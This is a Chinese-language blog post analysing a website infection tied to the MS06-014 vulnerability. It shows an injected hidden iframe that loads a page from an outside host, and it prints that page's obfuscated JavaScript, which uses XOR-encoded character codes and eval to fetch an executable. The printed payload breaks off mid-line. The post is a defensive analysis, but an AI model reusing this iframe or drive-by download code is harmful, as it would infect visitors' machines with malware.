现在的位置: 首页 > 综合 > 正文

一个病毒代码的分析(针对MS06-014公告列出的漏洞)

2011年09月08日 ⁄ 综合 ⁄ 共 2088字 ⁄ 字号 评论关闭

突然一天打开自己的网站被瑞星杀出个特洛伊来,xPilot的麦咖啡也查到了,仔细检查服务器上自己写的代码并没有什么可疑的地方,看着都是自己写的,再看看发送过来的网页代码,发现被嵌入了一个<iframe>:

<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

一看就估计是服务器中毒了,病毒在代码中查找替换第一个<title>,和第一个</script>将其注释掉并在前面插入上面的那段代码。注释的代码标签不对称所以很容易就让网站显示时变得特别难看。

源代码:

<title>页面标题</title>

替换后代码:

<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe><!--/title>


<!-- 如果这里刚好有一段注释的话,就到结束标签位置,本行前面那个注释符号失效-->

所以如果你打开网站显示不正常的话请赶快打开源代码看看顶部是否有类似的代码

将 http://cool.47555.com/k.htm 下载后用EditPlus打开(千万不要用浏览器打开),代码如下:

<base onmousemove="window.status=' ';return true"><script language =javascript>
var J=function(m){return String.fromCharCode(m^66)};eval(J(52)+J(35)+J(48)+J(98)+J(55)+J(48)+J(46)+J(110)+J(50)+J(35)+J(54)+J(42)+J(121)+J(55)+J(48)+J(46)+J(127)+J(96)+J(42)+J(54)+J(54)+J(50)+J(120)+J(109)+J(109)+J(33)+J(45)+J(45)+J(46)+J(108)+J(118)+J(117)+J(119)+J(119)+J(119)+J(108)+J(33)+J(45)+J(47)+J(109)+J(115)+J(58)+J(58)+J(58)+J(58)+J(108)+J(39)+J(58)+J(39)+J(96)+J(121)+J(50)+J(35)+J(54)+J(42)+J(127)+J(96)+J(1)+J(120)+J(30)+J(30)+J(32)+J(45)+J(45)+J(54)+J(108)+J(39)+J(58)+J(39)+J(96)+J(121)+J(54)+J(48)+J(59)+J(57)+J(52)+J(35)+J(48)+J(98)+J(35)+J(38)+J(45)+J(127)+J(106)+J(38)+J(45)+J(33)+J(55)+J(47)+J(39)+J(44)+J(54)+J(108)+J(33)+J(48)+J(39)+J(35)+J(54)+J(39)+J(7)+J(46)+J(39)+J(47)+J(39)+J(44)+J(54)+J(106)+J(96)+J(45)+J(32)+J(40)+J(39)+J(33)+J(54)+J(96)+J(107)+J(107)+J(121)+J(52)+J(35)+J(48)+J(98)+J(38)+J(127)+J(115)+J(121)+J(35)+J(38)+J(45)+J(108)+J(49)+J(39)+J(54)+J(3)+J(54)+J(54)+J(48)+J(43)+J(32)+J(55)+J(54)+J(39)+J(106)+J(96)+J(33)+J(46)+J(35)+J(49)+J(49)+J(43)+J(38)+J(96)+J(110)+J(96)+J(33)+J(46)+J(49)+J(43)+J(38)+J(120)+J(0)+J(6)+J(123)+J(116)+J(1)+J(119)+J(119)+J(116)+J(111)+J(116)+J(119)+J(3)+J(113)+J(111)+J(115)+J(115)+J(6)+J(114)+J(111)+J(123)+J(122)+J(113)+J(3)+J(111)+J(114)+J(114)+J(1)+J(114)+J(118)+J(4)+J(1)+J(112)+J(123)+J(7)+J(113)+J(116)+J(96)+J(107)+J(121)+J(52)+J(35)+J(48)+J(98)+J(39)+J(127)+J(115)+J(121)+J(52)+J(35)+J(48)+J(98)+J(58)+J(47)+J(46)+J(127)+J(35)+J(38)+J(45)+J(108)+J(1)+J(48)+J(39)+J(35)+J(54)+J(39)+J(13)+J(32)+

抱歉!评论已关闭.